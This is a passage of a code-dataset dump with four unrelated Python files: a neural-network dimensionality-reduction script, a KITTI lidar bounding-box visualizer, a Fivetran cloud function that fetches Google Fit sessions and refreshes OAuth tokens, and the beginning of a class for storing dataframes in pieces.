cv_train=X_train\n cv_test=y_train\n #re-format y values to match softmax output\n y_train = pd.get_dummies(y_train)\n # train and save the model\n model = Sequential()\n model.add(Dense(100, activation='relu', input_dim=339))\n model.add(Dense(neu_units, activation='relu', input_dim=100))\n model.add(Dense(8, activation='softmax'))\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n model.fit(X_train, y_train, epochs=epo, batch_size=10,shuffle=False,verbose=0)\n model.save(\"../output/model/{}_bs{}_mod.h5\".format(neu_units,current_bs_round))\n #whether to perform cross-validation on the model\n res = []\n if if_cv or (current_bs_round==0 and default_method==\"main analysis\"):\n kfold = StratifiedKFold(n_splits=5, shuffle=True, random_state=7)\n #for cross-validation, the original data will be split into 5 folds.\n for train, test in kfold.split(cv_train, cv_test):\n # create model\n modelx = Sequential()\n cv_train = np.array(cv_train)\n cv_test = np.array(cv_test)\n modelx.add(Dense(100, activation='relu', input_dim=339))\n modelx.add(Dense(neu_units , activation='relu', input_dim=100))\n modelx.add(Dense(8, activation='softmax'))\n modelx.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\n yt = pd.get_dummies(cv_test[train])\n modelx.fit(cv_train[train], yt, epochs=epo, batch_size=10,verbose=0)\n\n #to match the format\n predx = modelx.predict(cv_train[test])\n predx = [np.argmax(i) for i in predx]\n ytt = np.array(list(cv_test[test]))\n preds = label_binarize(predx, classes=labels)\n ypreds = label_binarize(ytt, classes=labels)\n #calculate AUC\n res2 = roc_auc_score(ypreds, preds, average='weighted', multi_class='ovo')\n res.append(res2)\n #whether do cross 
validation for each diagnosis\n if detailed_auc_trigger or current_bs_round==0:\n for p in range(len(labels)):\n tt = np.array([elem[p] for elem in list(ypreds)])\n pred_y_2 = np.array([elem[p] for elem in list(preds)])\n fpr, tpr, thresholds = metrics.roc_curve(tt,pred_y_2, pos_label=1)\n auroc = round(metrics.auc(fpr, tpr), 2)\n auc_for_each_diag[id_to_disease[p]].append(auroc)\n #general AUC for cross validation\n bs_cv_result_file.write(str(neu_units ) + \",\" +str(current_bs_round)+\",\" + str(sum(res) / 5) + \",\" + \",\".join(str(vall) for vall in res) + \"\\n\")\n #AUCrecord for cross validation on each diagnosis\n if detailed_auc_trigger or current_bs_round==0:\n cv_out=open(cv_out_path+\"units_{}_bs_{}.csv\".format(neu_units,current_bs_round),\"w\")\n cv_out.write(\"diag,round1,round2,round3,round4,round5,average\\n\")\n cv_out.write(\"Weighted AUC,\"+\",\".join(str(vall) for vall in res)+\",\"+str(sum(res) / 5)+\"\\n\")\n for each_diag in auc_for_each_diag:\n cv_out.write(each_diag+\",\"+\",\".join(str(vall) for vall in auc_for_each_diag[each_diag])+\",\"+str(sum(auc_for_each_diag[each_diag]) / 5) +\"\\n\")\n cv_out.close()\n\n #load the model to get hidden units for each patient\n model = load_model(\"../output/model/{}_bs{}_mod.h5\".format(neu_units,current_bs_round))\n m1 = Model(inputs=model.input, outputs=model.layers[1].output)\n p = m1.predict(X_test)\n filename=(\"../output/hidden_layer_out/encode_100_{}_bs_{}.xlsx\").format(neu_units,current_bs_round)\n #make sure to have index=False\n pd.DataFrame(p).to_excel(filename, index=False)\n #formatting the data to generate AUC for current round. The score is meaningless since we use all the patients to train and test\n pred = model.predict(X_test)\n pred = [np.argmax(i) for i in pred]\n y_test = np.array(list(y_test))\n pred = np.array([int(i) for i in list(pred)])\n preds = label_binarize(pred, classes=labels)\n ypreds = label_binarize(y_test, classes=labels)\n res = roc_auc_score(ypreds, preds, average='weighted', multi_class='ovo')\n print(\"hidden unit:{}, round: {}\".format(neu_units,current_bs_round))\n #get the PCA output and the patient graph.\n pca_and_pic(filename, neu_units, sampled_bootstrapping_file, current_bs_round)\n\nbs_cv_result_file.close()\n\n\n\n\n\n","repo_name":"chenjunren-ihcams/THAMP","sub_path":"src/ANN_dim_reduce.py","file_name":"ANN_dim_reduce.py","file_ext":"py","file_size_in_byte":11239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"74351160746","text":"import open3d as o3d\nimport pykitti.utils as pk_utils\nimport kitti_util as utils\nimport numpy as np\nfrom calibration import Calibration\nfrom objects3d_utils import get_objects_from_label\nfrom scipy.spatial import Delaunay\nimport scipy\nfrom waymo_open_dataset.utils.box_utils import compute_num_points_in_box_3d\n#import tensorflow as tf\n\n\n# kitti\n# pc_pathname = '/media/alex/Seagate Expansion Drive/kitti/velodyne/training/velodyne/002394.bin'\n# label_pathname = '/media/alex/Seagate Expansion Drive/kitti/label/training/label_2/002394.txt'\n# calib_pathname = '/media/alex/Seagate Expansion Drive/kitti/calib/training/calib/002394.txt'\n\n# use my own tool\n# pc_pathname = '/home/alex/github/waymo_to_kitti_converter/tools/waymo_kitti/velodyne/00000-00000.bin'\n# label_pathname = '/home/alex/github/waymo_to_kitti_converter/tools/waymo_kitti/label_all/00000-00000.txt'\n# calib_pathname = 
'/home/alex/github/waymo_to_kitti_converter/tools/waymo_kitti/calib/00000-00000.txt'\n\npc_pathname = '/home/caizhongang/playground/kitti/test_point_cloud/006985.bin'\nlabel_pathname = '/home/caizhongang/playground/kitti/test_label/006985.txt'\ncalib_pathname = '/home/caizhongang/playground/kitti/test_calib/006985.txt'\n\n# pc_range = [0, -40, -3.0, 70.4, 40, 3.0]\npc_range = None\n\n# def read_calib_file(filepath):\n# \"\"\"Read in a calibration file and parse into a dictionary.\"\"\"\n# data = {}\n#\n# with open(filepath, 'r') as f:\n# for line in f.readlines():\n# print('line', line)\n# key, value = line.split(':', 1)\n# # The only non-float values in these files are dates, which\n# # we don't care about anyway\n# try:\n# data[key] = np.array([float(x) for x in value.split()])\n# except ValueError:\n# pass\n#\n# return data\n\n\ndef in_hull(p, hull):\n \"\"\"\n :param p: (N, K) test points\n :param hull: (M, K) M corners of a box\n :return (N) bool\n \"\"\"\n try:\n if not isinstance(hull, Delaunay):\n hull = Delaunay(hull)\n flag = hull.find_simplex(p) >= 0\n except scipy.spatial.qhull.QhullError:\n print('Warning: not a hull %s' % str(hull))\n flag = np.zeros(p.shape[0], dtype=np.bool)\n\n return flag\n\n\ndef corners_to_lines(qs):\n \"\"\" Draw 3d bounding box in image\n qs: (8,3) array of vertices for the 3d box in following order:\n 7 -------- 4\n /| /|\n 6 -------- 5 .\n | | | |\n . 3 -------- 0\n |/ |/\n 2 -------- 1\n \"\"\"\n idx = [(1,0), (5,4), (2,3), (6,7), (1,2), (5,6), (0,3), (4,7), (1,5), (0,4), (2,6), (3,7)]\n\n # print('draw bbox')\n # print('qs', qs)\n\n line_set = o3d.geometry.LineSet(\n points=o3d.utility.Vector3dVector(qs),\n lines=o3d.utility.Vector2iVector(idx),\n )\n\n return line_set\n\n\ndef boxes3d_to_corners3d_lidar(boxes3d, bottom_center=True):\n \"\"\"\n :param boxes3d: (N, 7) [x, y, z, w, l, h, ry] in LiDAR coords, see the definition of ry in KITTI dataset\n :param z_bottom: whether z is on the bottom center of object\n :return: corners3d: (N, 8, 3)\n 7 -------- 4\n /| /|\n 6 -------- 5 .\n | | | |\n . 
3 -------- 0\n |/ |/\n 2 -------- 1\n \"\"\"\n boxes_num = boxes3d.shape[0]\n w, l, h = boxes3d[:, 3], boxes3d[:, 4], boxes3d[:, 5]\n x_corners = np.array([w / 2., -w / 2., -w / 2., w / 2., w / 2., -w / 2., -w / 2., w / 2.], dtype=np.float32).T\n y_corners = np.array([-l / 2., -l / 2., l / 2., l / 2., -l / 2., -l / 2., l / 2., l / 2.], dtype=np.float32).T\n if bottom_center:\n z_corners = np.zeros((boxes_num, 8), dtype=np.float32)\n z_corners[:, 4:8] = h.reshape(boxes_num, 1).repeat(4, axis=1) # (N, 8)\n else:\n z_corners = np.array([-h / 2., -h / 2., -h / 2., -h / 2., h / 2., h / 2., h / 2., h / 2.], dtype=np.float32).T\n\n ry = boxes3d[:, 6]\n zeros, ones = np.zeros(ry.size, dtype=np.float32), np.ones(ry.size, dtype=np.float32)\n\n # print('ry\\n', ry)\n\n rot_list = np.array([[np.cos(ry), -np.sin(ry), zeros],\n [np.sin(ry), np.cos(ry), zeros],\n [zeros, zeros, ones]]) # (3, 3, N)\n R_list = np.transpose(rot_list, (2, 0, 1)) # (N, 3, 3)\n\n # print('Rot\\n', R_list[-1])\n\n temp_corners = np.concatenate((x_corners.reshape(-1, 8, 1), y_corners.reshape(-1, 8, 1),\n z_corners.reshape(-1, 8, 1)), axis=2) # (N, 8, 3)\n\n # print('corners', temp_corners[-1])\n\n rotated_corners = np.matmul(temp_corners, R_list) # (N, 8, 3)\n\n # print('rotated_corners', rotated_corners[-1])\n\n x_corners, y_corners, z_corners = rotated_corners[:, :, 0], rotated_corners[:, :, 1], rotated_corners[:, :, 2]\n\n x_loc, y_loc, z_loc = boxes3d[:, 0], boxes3d[:, 1], boxes3d[:, 2]\n\n x = x_loc.reshape(-1, 1) + x_corners.reshape(-1, 8)\n y = y_loc.reshape(-1, 1) + y_corners.reshape(-1, 8)\n z = z_loc.reshape(-1, 1) + z_corners.reshape(-1, 8)\n\n # print('bbox\\n', np.stack([x_loc, y_loc, z_loc, w, l, h, ry], axis=0).T)\n\n corners = np.concatenate((x.reshape(-1, 8, 1), y.reshape(-1, 8, 1), z.reshape(-1, 8, 1)), axis=2)\n\n # print('shifted_corners\\n', corners[-1])\n # print(corners.shape)\n\n return corners.astype(np.float32)\n\n\ndef transform_pc(pc, R0, V2C):\n tf = np.matmul(R0, V2C)\n assert pc.shape[1] == 3\n pc = np.transpose(pc)\n ones = np.ones((1, pc.shape[1]))\n pc = np.vstack([pc, ones])\n tf_pc = np.matmul(tf, pc)\n #tf_pc = tf_pc[:3, :] / tf[3, :]\n tf_pc = np.transpose(tf_pc)\n return tf_pc\n\n\ndef filter_range(pc, pc_range):\n xmin, ymin, zmin, xmax, ymax, zmax = pc_range\n cond1 = xmin < pc[:, 0]\n cond2 = pc[:, 0] < xmax\n cond3 = ymin < pc[:, 1]\n cond4 = pc[:, 1] < ymax\n cond5 = zmin < pc[:, 2]\n cond6 = pc[:, 2] < zmax\n\n # print(cond1, cond2, cond3, cond4, cond5, cond6)\n\n s = (cond1.astype(np.int) + cond2.astype(np.int) + cond3.astype(np.int) + cond4.astype(np.int) + cond5.astype(np.int) + cond6.astype(np.int))\n # print(s)\n\n select = s == 6\n # print(sum(select), len(select))\n return pc[select]\n\n\ndef main():\n # visualized in lidar frame\n\n # pc = pk_utils.load_velo_scan(pc_pathname)\n pc = np.fromfile(pc_pathname, dtype=np.float32).reshape(-1, 4)\n # print('pc', pc)\n\n if pc_range is not None:\n pc = filter_range(pc, pc_range)\n\n # print('pc, just loaded', pc.shape)\n pc = pc[:, :3]\n # print('pc, after slicing', pc.shape)\n\n # objs = utils.read_label(label_pathname)\n # calib = pk_utils.read_calib_file(calib_pathname)\n # calib = read_calib_file(calib_pathname)\n\n # V2C = np.array(calib['Tr_velo_to_cam']).reshape(3,4)\n # R0 = np.array(calib['R0_rect']).reshape(3,3)\n # P0 = np.array(calib['P0']).reshape(3,4)\n\n # print(V2C, R0, P0)\n\n # pc = transform_pc(pc, R0, V2C)\n\n # print(pc.shape)\n\n obj_list = get_objects_from_label(label_pathname)\n obj_list = [o for o in obj_list 
if o.cls_type in ['Car', 'Pedestrian', 'Cyclist']]\n calib = Calibration(calib_pathname)\n\n loc = np.concatenate([obj.loc.reshape(1, 3) for obj in obj_list], axis=0)\n dims = np.array([[obj.l, obj.h, obj.w] for obj in obj_list]) # lhw(camera) format\n rots = np.array([obj.ry for obj in obj_list])\n loc_lidar = calib.rect_to_lidar(loc)\n\n # print('loc\\n', loc)\n # print('loc_lidar\\n', loc_lidar)\n\n l, h, w = dims[:, 0:1], dims[:, 1:2], dims[:, 2:3]\n gt_boxes_lidar = np.concatenate([loc_lidar, w, l, h, rots[..., np.newaxis]], axis=1)\n\n print(gt_boxes_lidar)\n\n corners = boxes3d_to_corners3d_lidar(gt_boxes_lidar)\n\n # corners_lidar = calib.rect_to_lidar(corners)\n\n # bboxes3d = []\n # for o in objs:\n # bbox2d, bbox3d = utils.compute_box_3d(o, P0)\n # bboxes3d.append(bbox3d)\n\n num_points_in_gt = -np.ones(len(corners), dtype=np.int32)\n\n bboxes3d = []\n for i in range(corners.shape[0]):\n bboxes3d.append(corners[i])\n flag = in_hull(pc, corners[i])\n num_points_in_gt[i] = flag.sum()\n\n # gt_boxes_lidar_temp = gt_boxes_lidar.copy()\n # # print('bef\\n', gt_boxes_lidar_temp[:, 6])\n # # gt_boxes_lidar_temp[:, 6] = gt_boxes_lidar_temp[:, 6] - np.pi / 2\n # # print('aft\\n', gt_boxes_lidar_temp[:, 6])\n # num_points_in_gt_waymo = compute_num_points_in_box_3d(tf.convert_to_tensor(pc.astype(np.float32), dtype=tf.float32), tf.convert_to_tensor(gt_boxes_lidar_temp.astype(np.float32), dtype=tf.float32))\n #\n # print(pc, gt_boxes_lidar)\n print('PCDet:', num_points_in_gt)\n\n # print(tf.convert_to_tensor(pc.astype(np.float32), dtype=tf.float32), tf.convert_to_tensor(gt_boxes_lidar_temp.astype(np.float32), dtype=tf.float32))\n # print('Waymo:', num_points_in_gt_waymo.numpy())\n\n # draw\n pcd = o3d.geometry.PointCloud()\n # print(pc)\n pcd.points = o3d.utility.Vector3dVector(pc)\n\n axis = o3d.geometry.TriangleMesh.create_coordinate_frame(\n size=1, origin=[0,0,0])\n\n visual = [pcd, axis]\n # visual = [pcd]\n #\n # print('add bbox3d')\n for bbox3d in bboxes3d:\n # print(bbox3d)\n visual.append(corners_to_lines(bbox3d))\n\n\n\n o3d.visualization.draw_geometries(visual)\n\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"caizhongang/waymo_kitti_converter","sub_path":"tools/kitti_label_visualizer.py","file_name":"kitti_label_visualizer.py","file_ext":"py","file_size_in_byte":9248,"program_lang":"python","lang":"en","doc_type":"code","stars":114,"dataset":"github-code","pt":"37"} +{"seq_id":"4184107676","text":"import datetime as dt\nimport requests as rq\n\nfrom dateutil import parser, tz\nfrom requests.auth import HTTPBasicAuth\n\n\ndef refresh_oauth_token(request):\n \"\"\"Refresh an OAuth2 \"Authorization Code Grant Flow\" refresh token.\n\n Parameters\n ----------\n request: flask.Request\n GCP Cloud Function request context. 
The request will match this spec:\n https://fivetran.com/docs/functions#requestformat\n\n Returns\n -------\n dict\n A new refresh and access token pair\n \"\"\"\n\n request_json = request.get_json()\n\n content_header = {\"Content-Type\": \"application/x-www-form-urlencoded\"}\n\n post_params = {\n \"grant_type\": \"refresh_token\",\n \"refresh_token\": request_json[\"state\"][\"refresh_token\"],\n }\n\n resp = rq.post(\n \"https://oauth2.googleapis.com/token\",\n headers=content_header,\n params=post_params,\n auth=HTTPBasicAuth(\n request_json[\"secrets\"][\"GFIT_CLIENT_ID\"],\n request_json[\"secrets\"][\"GFIT_CLIENT_SECRET\"],\n ),\n )\n\n if resp.status_code != 200:\n raise ValueError(f\"OAuth token refresh request returned {resp.json()}\")\n\n new_token = resp.json()\n\n return new_token\n\n\ndef handler(request):\n \"\"\"Scrape data from Google Fit.\n\n Parameters\n ----------\n request: flask.Request\n GCP Cloud Function request context. The request will match this spec:\n https://fivetran.com/docs/functions#requestformat\n\n Returns\n -------\n dict\n A response matching this spec:\n https://fivetran.com/docs/functions#responseformat\n \"\"\"\n\n request_json = request.get_json()\n\n # initialize state for the case when fivetran is starting from scratch.\n # put initial values for the cursor and tokens in the 'secrets' node.\n # fivetran should automatically keep track of subsequent updates in the\n # 'state' node.\n if \"cursor\" not in request_json[\"state\"]:\n request_json[\"state\"][\"cursor\"] = request_json[\"secrets\"][\"cursor\"]\n if \"access_token\" not in request_json[\"state\"]:\n request_json[\"state\"][\"access_token\"] = request_json[\"secrets\"][\"access_token\"]\n if \"refresh_token\" not in request_json[\"state\"]:\n request_json[\"state\"][\"refresh_token\"] = request_json[\"secrets\"][\"refresh_token\"]\n\n cursor = request_json[\"state\"][\"cursor\"]\n cursor_date = parser.parse(cursor).date()\n\n if cursor_date > dt.date.today():\n raise ValueError(\n f\"cursor value {cursor_date.isoformat()} is later than \"\n f\"today's date {dt.date.today().isoformat()}\"\n )\n\n # if the cursor is at the current date return immediately without\n # incrementing the cursor. This is to ensure we don't pull data for a day\n # until that day is over.\n if cursor_date == dt.date.today():\n return {\n 'state': request_json['state'],\n \"hasMore\": False,\n 'returnCause': 'Cursor date not complete yet',\n }\n\n # otherwise the cursor must be in the past so go ahead and pull data\n headers = {\n \"Accept-Language\": \"en_US\",\n \"Authorization\": f'Bearer {request_json[\"state\"][\"access_token\"]}',\n }\n\n # control pagination with startTime and endTime parameters which have to be\n # RFC3339 timestamps. in this case this means adding a timezone. 
See:\n # https://developers.google.com/fit/rest/v1/reference/users/sessions/list#parameters\n start_date = cursor_date\n end_date = cursor_date + dt.timedelta(days=1)\n\n params = {\n # hardcoding 'America/Chicago' timezone because that makes the date\n # cursor intuitive for my data\n \"startTime\": dt.datetime(\n start_date.year,\n start_date.month,\n start_date.day,\n tzinfo=tz.gettz(\"America/Chicago\"),\n ).isoformat(),\n \"endTime\": dt.datetime(\n end_date.year,\n end_date.month,\n end_date.day,\n tzinfo=tz.gettz(\"America/Chicago\"),\n ).isoformat(),\n }\n\n sessions = rq.get(\n \"https://www.googleapis.com/fitness/v1/users/me/sessions\",\n headers=headers,\n params=params,\n )\n\n # the google fit API returns a 401 code when the access token has expired\n if sessions.status_code == 401:\n\n new_token = refresh_oauth_token(request)\n\n # apparently the way Google APIs do OAuth the refresh token never\n # expires and so doesn't need to be refreshed itself\n # c.f. https://developers.google.com/identity/protocols/oauth2/web-server#offline\n # c.f. https://stackoverflow.com/questions/8942340/get-refresh-token-google-api\n return {\n \"state\": {\n \"cursor\": cursor_date.isoformat(),\n \"access_token\": new_token[\"access_token\"],\n \"refresh_token\": request_json[\"state\"][\"refresh_token\"],\n },\n \"hasMore\": True,\n 'returnCause': 'OAuth token required refresh',\n }\n\n # parse the response from the Google Fit API\n sessions_json = sessions.json()\n\n sessions_insert = [\n {\n \"date\": cursor_date.isoformat(),\n \"id\": sess[\"id\"],\n \"name\": sess[\"name\"],\n \"description\": sess[\"description\"],\n \"start_time_millis\": sess[\"startTimeMillis\"],\n \"end_time_millis\": sess[\"endTimeMillis\"],\n \"modified_time_millis\": sess[\"modifiedTimeMillis\"],\n \"source\": sess[\"application\"][\"packageName\"],\n }\n for sess in sessions_json[\"session\"]\n ]\n\n return {\n \"state\": {\n \"cursor\": (cursor_date + dt.timedelta(days=1)).isoformat(),\n \"access_token\": request_json[\"state\"][\"access_token\"],\n \"refresh_token\": request_json[\"state\"][\"refresh_token\"],\n },\n \"insert\": {\"sessions\": sessions_insert if sessions_insert else None},\n \"schema\": {\n \"sessions\": {\"primary_key\": [\"date\", \"id\"]},\n },\n \"hasMore\": True,\n }\n","repo_name":"hinnefe2/exercise_dashboard","sub_path":"cloud_functions/googlefit/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5985,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"86261411307","text":"from general import *\n\n\n\n\nclass BaseFEFS():\n \n ##########################################################################################################\n ########################################## Class Variables: BEG ##########################################\n extension = \"fefs\"\n index_df_name = \".index.csv\"\n meta_json_name = \".meta.json\"\n # Levels: 0) \"update\", 1) \"split\", 2) \"merge\", 3) \"save\", 4) \"delete\", 5) \"\".\n action_domain = [\"update\", \"split\", \"merge\", \"save\", \"delete\", \"\"]\n ########################################## Class Variables: END ##########################################\n ##########################################################################################################\n\n \n def print_info(self):\n print(\"path:\",self.path, \", name:\", self.name)\n print(\"pieces:\", self.pieces)\n print(\"types:\", self.types)\n print(\"fr:\", self.fr, \", to:\", self.to)\n \n print_frs = 
self.frs\n print_tos = self.tos\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n try:\n print_frs = [ self.seq_inv_trans_method(fr) for fr in self.frs ]\n print_tos = [ self.seq_inv_trans_method(to) for to in self.tos ]\n except: \n pass\n else:\n assert self.seq_trans_method is None\n \n print(\"frs:\", print_frs)\n print(\"tos:\", print_tos)\n \n \n print(\"seq_col:\", self.seq_col)\n \n print(\"piece_name_len:\", self.piece_name_len)\n print(\"colnames:\", self.colnames, \", row_cnt:\", self.row_cnt)\n print(\"row_cnts:\", self.row_cnts)\n print(\"actions:\", self.actions, \", action_params:\", self.action_params)\n print(\"cache:\", self.cache, \", cache_config:\", self.cache_config)\n if self.dfs is None:\n print(\"dfs:\", self.dfs)\n else:\n print(\"dfs:\", [ \"Non-empty\" if df is not None else df for df in self.dfs ])\n return\n\n\n\n ###########################################################################################################\n ############################################ Init methods: BEG ############################################\n def __init__(self):\n \n self.verbose = False\n \n # It has to be followed by self.read()\n self.path = None\n self.name = None\n \n # Keys from dict_meta\n self.max_row_per_piece = None\n self.row_cnt = None\n # self.datetime_format = None\n self.seq_col = None\n \n self.piece_name_len = None\n self.fr = None\n self.to = None\n self.colnames = None\n self.cache_config = None\n \n # Columns from df_index\n self.pieces = None\n self.types = None\n self.frs = None\n self.tos = None\n self.row_cnts = None\n \n \n # Following are not columns in df_index\n \"\"\"\n Levels: 0) \"update\", 1) \"split\", 2) \"merge\", 3) \"save\", 4) \"delete\", 5) \"\".\n \n - \"\" : Nothing to do\n - \"update\" : Update df_index's fr and to, and update meta's fr and to.\n After finishing the update, action will become \"save\".\n - \"save\" : Save file to the same piece name. \n - \"delete\" : Delete file, remove from all lists, update meta's fr and to.\n - \"split\" : Retain this file, create another one(s). Both/all leave with an \"update\" action.\n - \"merge\",i : Find i in params, retain this file, leave this with a \"save\" action,\n the index i file with a \"delete\" action. 
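\n\n Illustrative example (added): with actions == [\"merge\", \"\", \"\"] and\n action_params[0] == 2, take_actions(max_level=4) merges piece 2 into\n piece 0, re-\"update\"s piece 0's range, \"save\"s it, and \"delete\"s piece 2.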
\n \"\"\"\n self.actions = None\n self.action_params = None\n self.dfs = None # the elements can be df or FEFS\n \n # Cache section\n self.cache = None\n \n self.seq_trans_method = None\n self.seq_inv_trans_method = None\n self.seq_read_dtype = None\n self.seq_type = None\n \n \n\n\n @classmethod\n def create(cls, dict_meta, name, path=None):\n \"\"\"\n Usecase\n --------\n When you start with nothing but will add dataframes subsequently.\n \"\"\"\n \n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert cls != BaseFEFS\n \n \n # It is supposed to be followed by fefs += df\n fefs = cls()\n \n if path is None:\n path = os.getcwd()\n fefs.path = path\n fefs.name = name\n \n \n fefs.row_cnt = None\n fefs.fr = None\n fefs.to = None \n fefs.pieces = []\n fefs.types = []\n \n fefs.frs = []\n fefs.tos = []\n fefs.row_cnts = []\n\n fefs.actions = []\n fefs.action_params = []\n fefs.dfs = []\n\n # Cache section\n fefs.cache = []\n \n \n # Keys from dict_meta\n fefs = fefs.load_meta(dict_meta)\n \n \n return fefs\n \n\n\n def __check_cache_config(self):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n \"\"\"\n cache_config = {\"rows_in_cache\":1000000, \"len_of_cache\":None}\n or \n cache_config = {\"rows_in_cache\":None, \"len_of_cache\":10}\n \"\"\"\n cache_config = self.cache_config\n assert isinstance(cache_config,dict)\n assert (\"rows_in_cache\" in cache_config.keys()) and (\"len_of_cache\" in cache_config.keys())\n assert (cache_config[\"rows_in_cache\"] is None) or (cache_config[\"len_of_cache\"] is None)\n assert (cache_config[\"rows_in_cache\"] is not None) or (cache_config[\"len_of_cache\"] is not None)\n \n \n\n \n def load_meta(self,dict_meta):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n\n \n # Keys from dict_meta\n self.max_row_per_piece = dict_meta[\"max_row_per_piece\"]\n # self.datetime_format = dict_meta[\"datetime_format\"]\n self.seq_col = dict_meta[\"seq_col\"]\n \n self.piece_name_len = dict_meta[\"piece_name_len\"]\n self.colnames = dict_meta[\"colnames\"]\n self.cache_config = dict_meta[\"cache_config\"]\n self.__check_cache_config()\n \n try:\n self.row_cnt = dict_meta[\"row_cnt\"]\n except:\n pass\n\n\n\n # dtf = self.datetime_format\n try:\n self.fr = dict_meta[\"fr\"]\n self.to = dict_meta[\"to\"]\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n self.fr = self.seq_trans_method(self.fr)\n self.to = self.seq_trans_method(self.to)\n except:\n pass\n\n return self\n\n\n\n def dump_meta(self):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n # Keys from dict_meta\n dict_meta = {}\n dict_meta[\"max_row_per_piece\"] = self.max_row_per_piece\n # dict_meta[\"datetime_format\"] = self.datetime_format\n dict_meta[\"seq_col\"] = self.seq_col\n \n dict_meta[\"piece_name_len\"] = self.piece_name_len\n dict_meta[\"colnames\"] = self.colnames\n dict_meta[\"cache_config\"] = self.cache_config\n\n try:\n dict_meta[\"row_cnt\"] = self.row_cnt\n except:\n pass\n\n # dtf = self.datetime_format\n try:\n dict_meta[\"fr\"] = self.fr\n dict_meta[\"to\"] = self.to\n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n dict_meta[\"fr\"] = self.seq_inv_trans_method(self.fr)\n 
dict_meta[\"to\"] = self.seq_inv_trans_method(self.to)\n except:\n pass\n \n return dict_meta\n\n\n\n def load_index_df(self, df_index, orders=None):\n\n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n if len(df_index) == 0:\n self.pieces = []\n self.types = []\n self.frs = []\n self.tos = []\n self.row_cnts = []\n return self\n\n # dtf = self.datetime_format\n if self.seq_trans_method is not None:\n assert self.seq_inv_trans_method is not None\n df_index[\"fr\"] = df_index[\"fr\"].apply(lambda x: self.seq_trans_method(x))\n df_index[\"to\"] = df_index[\"to\"].apply(lambda x: self.seq_trans_method(x))\n df_index = df_index.sort_values(by=\"fr\").reset_index(drop=True)\n \n self.pieces = list(df_index[\"piece\"])\n self.types = list(df_index[\"type\"])\n self.frs = list(df_index[\"fr\"])\n self.tos = list(df_index[\"to\"])\n self.row_cnts = list(df_index[\"row_cnt\"])\n \n try:\n self.fr, self.to = min(self.frs), max(self.tos)\n self.row_cnt = sum(self.row_cnts)\n except:\n pass\n \n \n if orders is not None:\n self.dfs = [ self.dfs[order_] for order_ in orders ]\n self.actions = [ self.actions[order_] for order_ in orders ]\n self.action_params = [ self.action_params[order_] for order_ in orders ]\n \"\"\"\n Let's say \n orders = [3,5,4,0,2,1] => idx3 -> idx0, idx5 -> idx1, ...\n If cache = [4,3,5] \n => [ orders.index(4), orders.index(3), orders.index(1) ]\n \"\"\"\n self.cache = [ orders.index(cac) for cac in self.cache ]\n \n return self\n\n\n \n def dump_index_df(self):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n df_empty = pd.DataFrame({\"piece\":[],\"type\":[],\"fr\":[],\"to\":[],\"row_cnt\":[]})\n empty_orders = list(df_empty.index)\n if self.pieces is None:\n assert all([ l is None for l in [self.types, self.frs, self.tos, self.row_cnts] ])\n return (df_empty, empty_orders)\n elif len(self.pieces) == 0:\n assert all([ len(l)==0 for l in [self.types, self.frs, self.tos, self.row_cnts] ])\n return (df_empty, empty_orders)\n \n df_index = pd.DataFrame()\n df_index[\"piece\"] = self.pieces\n df_index[\"type\"] = self.types\n df_index[\"fr\"] = self.frs\n df_index[\"to\"] = self.tos\n df_index[\"row_cnt\"] = self.row_cnts\n df_index = df_index.sort_values(by=\"fr\")\n orders = list(df_index.index)\n df_index = df_index.reset_index(drop=True)\n \n if self.seq_inv_trans_method is not None:\n assert self.seq_trans_method is not None\n df_index[\"fr\"] = df_index[\"fr\"].apply(lambda x: self.seq_inv_trans_method(x))\n df_index[\"to\"] = df_index[\"to\"].apply(lambda x: self.seq_inv_trans_method(x))\n \n return (df_index, orders)\n \n\n \n def clone(self, path, name):\n \n \"\"\" \n Base class should never be actually called,\n have to be an implemented class.\n \"\"\"\n assert self.__class__ != BaseFEFS\n \n \n # It is supposed to be followed by fefs += df\n fefs = self.__class__()\n \n fefs.path = path\n fefs.name = name\n \n fefs.max_row_per_piece = self.max_row_per_piece\n # fefs.datetime_format = self.datetime_format\n fefs.seq_col = self.seq_col\n \n fefs.piece_name_len = self.piece_name_len\n fefs.colnames = dc(self.colnames)\n fefs.cache_config = dc(self.cache_config)\n fefs.fr = self.fr\n fefs.to = self.to\n fefs.row_cnt = self.row_cnt\n \n fefs.pieces = dc(self.pieces)\n fefs.types = dc(self.types)\n fefs.frs = dc(self.frs)\n fefs.tos = dc(self.tos)\n fefs.row_cnts = dc(self.row_cnts)\n\n 
